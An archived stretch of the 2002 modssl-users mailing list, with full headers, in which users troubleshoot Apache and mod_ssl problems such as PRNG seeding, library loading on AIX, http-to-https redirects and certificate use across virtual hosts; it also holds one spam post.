anything else could have interfered with > my installed system. > > Can anyone suggest what may have happened, or a good way to trouble > shoot this problem? > > Thank you > > -Brian Young > > > Software versions: > Mac OS X 10.1.2 > Apache/1.3.22 (Darwin) > mod_ssl/2.8.5 > OpenSSL/0.9.5a. > NET::SSLeay v1.12 > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 11 06:01:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id GAA29014; Mon, 11 Feb 2002 06:00:50 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from solarian.neurosphere.com id FAA28926; Mon, 11 Feb 2002 05:59:45 +0100 (MET) Received: from localhost (localhost [127.0.0.1]) by solarian.neurosphere.com (Postfix) with ESMTP id 88D9350293 for ; Sun, 10 Feb 2002 21:06:07 -0800 (PST) Date: Sun, 10 Feb 2002 21:06:07 -0800 (PST) From: Steve Scheck X-Sender: posting@localhost To: modssl-users@modssl.org Subject: PRNG Seeding Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Steve Scheck X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I feel like a major lamer asking this as I'm sure it's a simple matter, but I must have missed it somewhere in the docs. I built an apache+mod_ssl server according to the instructions given in the example section on the modssl website, without apparent problems. However, when I attempt to start the server, using ./apachectl start|startssl, it spews: ./apachectl start: httpd could not be started and I get this in the server logs: [Sun Feb 10 21:04:23 2002] [error] mod_ssl: Init: Failed to generate temporary 512 bit RSA private key (OpenSSL library error follows) [Sun Feb 10 21:04:23 2002] [error] OpenSSL: error:24064064:random number generator:SSLEAY_RAND_BYTES:PRNG not seeded [Sun Feb 10 21:04:23 2002] [error] OpenSSL: error:04069003:rsa routines:RSA_generate_key:BN lib How do I seed the PRNG? Thanks, -sjs ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 11 09:31:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA07921; Mon, 11 Feb 2002 09:30:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id JAA07850; Mon, 11 Feb 2002 09:29:49 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA09096 for ; Mon, 11 Feb 2002 09:29:36 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma009022; Mon, 11 Feb 02 09:29:29 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA03060 for ; Mon, 11 Feb 2002 09:29:28 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA08692 for ; Mon, 11 Feb 2002 09:29:28 +0100 (MET) Message-ID: <3C6780E8.E396A890@bourse.ch> Date: Mon, 11 Feb 2002 09:29:28 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: directing http --> https References: <3C62691D.87F841A6@bourse.ch> <1013219870.3c64821e61b90@ulairi.csun.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users ulairi@csun.edu wrote: > > RedirectMatch (.*) https://d.com$1 > > > > Won't this create an infinate loop? > I could be wrong, but I think RedirectMatch will pick up the hit via http or https, and attempt to send the user to https://d.com$1 even if the user came via https in the first place. > It depends on the "context" - i.e. where you put the directive in the httpd.conf file. If you put it outside of any virtualhost container it will have "server-config" context which means it will apply globally to all VHs. Then you will have trouble... However, if you have virtualhosts defined and you put the directive inside a VH container, it will have "virtualhost" context which means that it will only apply to that VH. Since you are using VHs, you must put the directive inside the plain HTTP VH for "d.com". Then it will only apply to HTTP requests to d.com. > mod_rewrite seems to be the only alternative I've seen so far. If I'm wrong, let me know... mod_rewrite is great and I'm a big fan, but it is a sledge-hammer to crack a nut in this instance. Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 11 10:58:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA13293; Mon, 11 Feb 2002 10:57:42 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from naxos.pdb.sbs.de id KAA13230; Mon, 11 Feb 2002 10:56:33 +0100 (MET) Received: from trolli.pdb.fsc.net (ThisAddressDoesNotExist [172.25.97.20] (may be forged)) by naxos.pdb.sbs.de (8.11.2/8.11.2) with ESMTP id g1B80FT03016 for ; Mon, 11 Feb 2002 09:00:15 +0100 Received: from deejai2.mch.fsc.net (deejai2.mch.fsc.net [172.25.124.236]) by trolli.pdb.fsc.net (8.9.3/8.9.3) with ESMTP id KAA31926 for ; Mon, 11 Feb 2002 10:00:13 +0100 Received: (from martin@localhost) by deejai2.mch.fsc.net (8.11.6/8.11.6) id g1B90DN87856 for modssl-users@modssl.org; Mon, 11 Feb 2002 10:00:13 +0100 (CET) (envelope-from martin) Date: Mon, 11 Feb 2002 10:00:13 +0100 From: Martin Kraemer To: modssl-users@modssl.org Subject: [rl@math.technion.ac.il: unexplained phenonmenon: hanging apache processes (fwd)] Message-ID: <20020211100012.B86694@deejai2.mch.fsc.net> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="IiVenqGWf+H9Y6IX" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i X-Operating-System: FreeBSD 4.5-STABLE FreeBSD 4.5-STABLE X-Organization: Fujitsu Siemens Computers (Muenchen, Germany) X-Disclaimer: THE COMMENTS CONTAINED IN THIS MESSAGE REFLECT THE VIEWS OF THE WRITER AND ARE NOT NECESSARILY THE VIEWS OF FUJITSU-SIEMENS COMPUTERS X-No-Junk-Mail: I do not want to get *any* junk mail. Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Martin Kraemer X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --IiVenqGWf+H9Y6IX Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Fowarded from dev@httpd.apache.org: This seems to be a mod_ssl problem. Martin -- | Fujitsu Siemens Fon: +49-89-636-46021, FAX: +49-89-636-47655 | 81730 Munich, Germany --IiVenqGWf+H9Y6IX Content-Type: message/rfc822 Content-Disposition: inline Return-Path: Received: from trulli.pdb.fsc.net (trulli.pdb.fsc.net [172.25.96.20]) by deejai2.mch.fsc.net (8.11.6/8.11.6) with ESMTP id g17BweD88034 for ; Thu, 7 Feb 2002 12:58:40 +0100 (CET) (envelope-from dev-return-26087-Martin.Kraemer=fujitsu-siemens.com@httpd.apache.org) Received: from pdbrd02e.pdb.fsc.net (pdbrd02e.pdb.fsc.net [172.25.96.15]) by trulli.pdb.fsc.net (8.9.3/8.9.3) with ESMTP id MAA29364 for ; Thu, 7 Feb 2002 12:58:38 +0100 Received: by pdbrd02e.pdb.fsc.net with Internet Mail Service (5.5.2653.19) id <1JKF7RQZ>; Thu, 7 Feb 2002 12:58:38 +0100 Received: from trolli.pdb.fsc.net ([172.25.97.20]) by pdbrd01e.pdb.fsc.net with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id D52RZKD3; Thu, 7 Feb 2002 12:58:13 +0100 Received: from nixpbe.pdb.sbs.de (nixpbe.pdb.sbs.de [192.109.2.33]) by trolli.pdb.fsc.net (8.9.3/8.9.3) with ESMTP id MAA29758 for ; Thu, 7 Feb 2002 12:58:12 +0100 Received: from apache.org (daedalus.apache.org [64.125.133.20]) by nixpbe.pdb.sbs.de (8.11.2/8.11.2) with SMTP id g17BwBn21304 for ; Thu, 7 Feb 2002 12:58:12 +0100 Received: (qmail 84668 invoked by uid 500); 7 Feb 2002 11:58:09 -0000 Received: (qmail 84655 invoked from network); 7 Feb 2002 11:58:09 -0000 From: "Zvi Har'El" Reply-To: dev@httpd.apache.org To: Apache Developer List Cc: "Nadav Har'El" Mailing-List: contact dev-help@httpd.apache.org; run by ezmlm Precedence: bulk list-help: list-unsubscribe: list-post: Delivered-To: mailing list dev@httpd.apache.org Date: Thu, 7 Feb 2002 13:57:24 +0200 (IST) Subject: unexplained phenonmenon: hanging apache processes (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Dear friends, Nadav, my son, sent the enclosed message to the Apache's users mailing list, and drew blank. I resend it here, hoping the top Apache gurus participating in the discussions here may give some insight. We are really puzzled by the described behavior. Best, Zvi. -- Dr. Zvi Har'El mailto:rl@math.technion.ac.il Department of Mathematics tel:+972-54-227607 Technion - Israel Institute of Technology fax:+972-4-8324654 http://www.math.technion.ac.il/~rl/ Haifa 32000, ISRAEL "If you can't say somethin' nice, don't say nothin' at all." -- Thumper (1942) Thursday, 25 Shevat 5762, 7 February 2002, 1:39PM ---------- Forwarded message ---------- Date: Sun, 20 Jan 2002 13:28:09 +0200 From: Nadav Har'El To: users@httpd.apache.org Subject: unexplained phenomenon: hanging apache processes Resent-Date: Thu, 7 Feb 2002 11:00:23 +0200 Resent-From: nyh@math.technion.ac.il Resent-To: "Zvi Har'El" Recently I've stumbled a puzzling problem when trying to measure Apache's performance using Microsoft's WAS (Web Application Stress Tool) or Radview's WebLOAD. I was wondering if anyone ever noticed this phenomenon, or can suggest an explanation, and any guess on whether this is a bug in Apache (or Linux), or what. The problem is that something in the measurement client, the server OS (I tried Linux 2.2.16, 2.2.19 and 2.4.3), Apache (I tried 1.3.20), or modssl (I tried both without it and with it) - something causes one or more of the httpd processes to "hang", blocking on reading input from the client which will never come. Such a blocking process will remain blocked for 300 seconds (or another period defined by the Apache "Timeout" directive), so over time more and more processes can get hung; On WebLOAD measurements with very high loads, starting apache with 250 processes, we consistently got them all blocked after roughly 10 minutes, at which point Apache's throughput obviously dropped down to zero. But it is even easier to recreate this problem when Apache is limited (with MaxClients) to a smaller number of processes: For example with 9 processes Webload will hang them all in a few minutes, and with 2 processes Microsoft WAS will hang them both (if you configure it to do SSL requests) almost immediately. I tried several experiments to understand what is going on, but so far without being able to fully explain it, so I was hoping maybe someone else noticed this problem and can shed some light on it (or just say "I've seen it too!"). For example, when I measure Apache with one process (http -X) with MS-WAS and SSL requests, and run a sniffer to see what's going on, I see the first request being handled perfectly, but already on the second request the client (MS-WAS) suddenly stops sending the proper SSL protocol in the middle of a session, so the server (Apache) hangs on read. There is no RST or anything else sent by the client indicating that it wanted to close this session... This could have been downplayed as a bug in MS-WAS or the Windows it runs on, if it weren't for the fact that as I said I also see a similar problem with Radview's Webload, and that both of these tools seem (at least as far as I heard) to be rather respected in the industry. So, has anyone else ever noticed such a problem? Can anyone perhaps shed some light on it? Thanks in advance, Nadav. -- Nadav Har'El | Sunday, Jan 20 2002, 7 Shevat 5762 nyh@math.technion.ac.il |----------------------------------------- Phone: +972-53-245868, ICQ 13349191 |Don't be irreplaceable. If you can't be http://nadav.harel.org.il |replaced, you can't be promoted. --IiVenqGWf+H9Y6IX-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 11 17:06:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA29419; Mon, 11 Feb 2002 17:05:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailgw.office.sourceree.com id RAA29365; Mon, 11 Feb 2002 17:05:02 +0100 (MET) Received: from office.sourceree.com (tech201.internal.sourceree.com [192.168.215.70]) by mailgw.office.sourceree.com (8.9.3/8.9.3) with ESMTP id PAA00407 for ; Mon, 11 Feb 2002 15:49:43 GMT Message-ID: <3C67ECAA.FA59A398@office.sourceree.com> Date: Mon, 11 Feb 2002 16:09:14 +0000 From: Santosh Deshpande X-Mailer: Mozilla 4.7 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: (no subject) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Santosh Deshpande X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users My help request doesn't seem to appear on the list !!! how do I request help from user group? santosh ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 11 17:07:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA29570; Mon, 11 Feb 2002 17:06:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spiff.wake.tec.nc.us id RAA29506; Mon, 11 Feb 2002 17:05:23 +0100 (MET) Received: from localhost (dale@localhost) by spiff.wake.tec.nc.us (AIX4.3/8.9.3/8.9.3) with ESMTP id KAA29198 for ; Mon, 11 Feb 2002 10:56:28 -0500 Date: Mon, 11 Feb 2002 10:56:28 -0500 (EST) From: Dale Weaver X-Sender: dale@spiff To: modssl-users@modssl.org Subject: Re: libssl.so won't load In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Dale Weaver X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I tried putting in the sym links and it didn't work. Tried updating the LD_LIBRARY_PATH env variable. None of those worked. The problem appears to be that libssl.so is not in the libssl.a archive file. I have checked and libssl.a is a proper archive file. Looks like I need to use the ld command to link the module to the archive. Can anyone help with that in AIX? I am working with the man page for ld, but I am just a systems guy and not much of a software guru. It looks like Greek to me. I will figure it out eventually, but if someone could offer a little help to trim my learning curve I would greatly appreciate it. Thanks. On Fri, 8 Feb 2002, R. DuFresne wrote: > > Dale, > > You maybe running into the ld.so issue that faced a few sun admins trying > to install mod-ssl on those systems recently. This would require an > update of your systems ld.so system similiar to theirs. The man pages for > AIX should give you a clue as to the ways to do this for your AIX system > (a symlink from the out of bounds shared mod-ssl lib to the standard ld.so > lib dir, the environment variable LD_LIBRARY_PATH, fixing the > cache file /etc/ld.so.cache, etc>, as well look at the archives of the > past few weeks on these issues for those sun users. > > Hope this helps, thanks, > > Ron DuFresne > > On Fri, 8 Feb 2002, Dale Weaver wrote: > > > I have an AIX server running 4.3.3. I have installed openssl-0.9.6.3, > > > > Apache 1.3.19 and mod_ssl 2.8.2.0. All installed fine, however > > > > when I try to start the server I get the errors: > > > > Syntax error on line 236 of /etc/apache/httpd.conf: > > Cannot load /usr/local/lib/apache/libssl.so into server: 0509-022 Cannot > > load module /usr/local/lib/apache/libssl.so. > > 0509-150 Dependent module /usr/local/lib/libssl.a(libssl.so) could not be loaded. > > 0509-152 Member libssl.so is not found in archive > > 0509-022 Cannot load module /usr/local/lib/libssl.a. > > 0509-150 Dependent module /usr/local/lib/libssl.a could not be loaded > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 11 17:13:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA29817; Mon, 11 Feb 2002 17:12:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailgw.office.sourceree.com id RAA29803; Mon, 11 Feb 2002 17:11:58 +0100 (MET) Received: from office.sourceree.com (tech201.internal.sourceree.com [192.168.215.70]) by mailgw.office.sourceree.com (8.9.3/8.9.3) with ESMTP id PAA00462 for ; Mon, 11 Feb 2002 15:56:42 GMT Message-ID: <3C67EE4D.7CA81B20@office.sourceree.com> Date: Mon, 11 Feb 2002 16:16:13 +0000 From: Santosh Deshpande X-Mailer: Mozilla 4.7 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Multople VH with same certificate? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Santosh Deshpande X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users hi all, I would like to know whether a SSL certificate is issued to a specific domain? Can I run have two vhosts configured with a single certificate e.g. www.mydomain.com ( 213.x.x.x:443) and sub.mydomain.com ( 213.x.x.y:443) regards, Santosh ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 11 17:21:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA00128; Mon, 11 Feb 2002 17:20:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id RAA00097; Mon, 11 Feb 2002 17:19:29 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id RAA25217 for ; Mon, 11 Feb 2002 17:19:18 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma025204; Mon, 11 Feb 02 17:19:17 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id RAA03125 for ; Mon, 11 Feb 2002 17:19:16 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id RAA17376 for ; Mon, 11 Feb 2002 17:19:16 +0100 (MET) Message-ID: <3C67EF04.3C7092EB@bourse.ch> Date: Mon, 11 Feb 2002 17:19:16 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: libssl.so won't load References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dale Weaver wrote: > > I tried putting in the sym links and it didn't work. Tried updating > the LD_LIBRARY_PATH env variable. None of those worked. The problem > appears to be that libssl.so is not in the libssl.a archive file. > I have checked and libssl.a is a proper archive file. Looks like > I need to use the ld command to link the module to the archive. Can > anyone help with that in AIX? I am working with the man page for ld, > but I am just a systems guy and not much of a software guru. It looks > like Greek to me. I will figure it out eventually, but if someone > could offer a little help to trim my learning curve I would greatly > appreciate it. Er... AFAIK, the two files are fundamentally different. One doesn't contain the other... libssl.so is a compiled loadable object - You need to have it around whenever apache runs as it will get linked into the apache binary dynamically to service openssl function calls. libssl.a is, as you say, an archive file - it is used one-time by the compiler when you compile in openssl functions into your apache binary during compilation. You should have both in your openssl lib from when you compiled openssl. Rgds, OWen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 11 17:27:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA00353; Mon, 11 Feb 2002 17:26:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id RAA00338; Mon, 11 Feb 2002 17:25:45 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id RAA28439 for ; Mon, 11 Feb 2002 17:25:38 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma028398; Mon, 11 Feb 02 17:25:33 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id RAA04550 for ; Mon, 11 Feb 2002 17:25:33 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id RAA17864 for ; Mon, 11 Feb 2002 17:25:33 +0100 (MET) Message-ID: <3C67F07D.DEEE701D@bourse.ch> Date: Mon, 11 Feb 2002 17:25:33 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Multople VH with same certificate? References: <3C67EE4D.7CA81B20@office.sourceree.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Santosh Deshpande wrote: > > hi all, > I would like to know whether a SSL certificate is issued to a specific > domain? Yes - a normal certificate has the fully-qualified domain name in it. If you use the cert on another site, the browser will trap it and pop up an alert that the cert doesn't match the FQDN. > Can I run have two vhosts configured with a single certificate > e.g. www.mydomain.com ( 213.x.x.x:443) > and sub.mydomain.com ( 213.x.x.y:443) SSL doesn't care about the IP addresses. If you run two sites like this with one cert, it will "work" - but the browser will throw up an alert which might frighten off customers. I've heard you can get a wildcard certificate which will match *.mydomain.com - from Thwate, I think. Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 11 20:44:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA09896; Mon, 11 Feb 2002 20:43:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id UAA09838; Mon, 11 Feb 2002 20:42:11 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 40CA64CE73E; Mon, 11 Feb 2002 20:42:11 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1BJEgK57358; Mon, 11 Feb 2002 20:14:42 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ariel.yandex.ru id MAA17793; Mon, 11 Feb 2002 12:27:56 +0100 (MET) Received: from YAMAIL (ariel.yandex.ru) by mail.yandex.ru id ; Mon, 11 Feb 2002 13:57:47 +0300 Subject: mod_ssl To: modssl-users@modssl.org Date: Mon, 11 Feb 2002 13:57:47 +0300 (MSK) From: "vneshaudit" Message-Id: <3C67A3AB.00008A.16807@ariel.yandex.ru> MIME-Version: 1.0 X-Mailer: Yamail [ http://yandex.ru ] X-source-ip: 212.45.1.210 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "vneshaudit" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Can I use different from RSA/DSA algorithms for Key Exchange Algorithm (for instance)? If I can then is it possible just to change some settings in my Apache server or I need to get some different mod_ssl module? Thanks. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 11 20:44:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA09905; Mon, 11 Feb 2002 20:43:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id UAA09839; Mon, 11 Feb 2002 20:42:11 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 5D6854CE74E; Mon, 11 Feb 2002 20:42:11 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1BJF0R57370; Mon, 11 Feb 2002 20:15:00 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailgw.office.sourceree.com id QAA26900; Mon, 11 Feb 2002 16:05:28 +0100 (MET) Received: from devpc201 (tech201.internal.sourceree.com [192.168.215.70]) by mailgw.office.sourceree.com (8.9.3/8.9.3) with SMTP id OAA32705 for ; Mon, 11 Feb 2002 14:49:51 GMT From: "Santosh Deshpande" To: Subject: Certificate Date: Mon, 11 Feb 2002 15:09:22 -0000 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal In-Reply-To: <3C6780E8.E396A890@bourse.ch> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Santosh Deshpande" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users hi all, I would like to know whether a SSL certificate is issued to a specific domain? Can I run have two vhosts configured with a single certificate e.g. www.mydomain.com ( 213.x.x.x:443) and sub.mydomain.com ( 213.x.x.y:443) regards, Santosh ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 11 20:44:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA09921; Mon, 11 Feb 2002 20:43:31 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id UAA09846; Mon, 11 Feb 2002 20:42:13 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 8277C4CE755; Mon, 11 Feb 2002 20:42:11 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1BJFRc57489; Mon, 11 Feb 2002 20:15:27 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from cci-29palms.com id SAA03410; Mon, 11 Feb 2002 18:09:43 +0100 (MET) Message-Id: <200202111709.SAA03410@opensource.ee.ethz.ch> From: Jeff Graysmith To: modssl-users@modssl.org Subject: You know your email is vulnerable to SPAM Robots? Date: 11 Feb 2002 09:09:25 -0800 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_kVqKu10L_uLDKWJNZ_MA" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jeff Graysmith X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users ------=_kVqKu10L_uLDKWJNZ_MA Content-Type: text/plain Content-Transfer-Encoding: 8bit Hello, Please pardon the intrusion, but I saw that your email address modssl- users@modssl.org is in plain text on the site http://httpd.apache.org/docs- 2.0/ssl/ssl_faq.html making it vulnerable to be harvested by SPAM robots. There's a neat way to hide your email from robots, but have human users use it just like normal. http://63.241.136.161/ec10067/ Sincerely, Jeff Graysmith ------=_kVqKu10L_uLDKWJNZ_MA Content-Type: text/html Content-Transfer-Encoding: 8bit Hello,

Please pardon the intrusion, but I saw that your email address modssl-users@modssl.org is in plain text on the site http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html making it vulnerable to be harvested by SPAM robots.

There's a neat way to hide your email from robots, but have human users use it just like normal.
http://63.241.136.161/ec10067/

Sincerely,
Jeff Graysmith
 ------=_kVqKu10L_uLDKWJNZ_MA-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 12 03:50:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA28938; Tue, 12 Feb 2002 03:49:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from admin01-nyc.clicvu.com id DAA28911; Tue, 12 Feb 2002 03:48:25 +0100 (MET) Received: from [192.168.0.70] by admin01-nyc.clicvu.com (Post.Office MTA v3.5.3 release 223 ID# 0-64039U1000L100S0V35) with SMTP id com for ; Mon, 11 Feb 2002 21:45:22 -0500 Received: by SPIDERMAN with Internet Mail Service (5.5.2653.19) id ; Mon, 11 Feb 2002 21:51:55 -0500 Message-ID: <013445F6BB17D4119959005004AAEA9A6832A3@SPIDERMAN> From: Justin Greene To: "'modssl-users@modssl.org'" Subject: RE: You know your email is vulnerable to SPAM Robots? Date: Mon, 11 Feb 2002 21:51:53 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1B370.3A355F90" Sender: 